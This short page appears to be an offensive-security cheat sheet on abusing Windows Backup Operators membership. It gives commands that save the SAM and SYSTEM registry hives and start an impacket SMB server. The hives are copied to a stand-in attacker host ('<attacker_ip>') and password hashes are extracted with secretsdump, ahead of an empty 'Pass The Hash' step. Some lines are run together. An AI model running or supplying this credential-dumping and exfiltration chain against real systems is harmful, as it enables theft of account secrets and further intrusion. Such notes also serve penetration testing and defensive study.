Backup Operators Group
1. Backup SYSTEM and SAM Files
reg save hklm\sam C:\temp\sam.backup
reg save hklm\system C:\temp\system.backup2. Transfer the Files Using SMB
impacket-smbserver <share_name> <dest_folder_path> -smb2supportcopy C:\temp\sam.backup \\<attacker_ip>\<share_name>\sam.backup
copy C:\temp\system.backup \\<attacker_ip>\<share_name>\system.backup3. Extracting the hashes
impacket-secretsdump -sam sam.backup -system system.backup LOCAL4. Pass The Hash
Last updated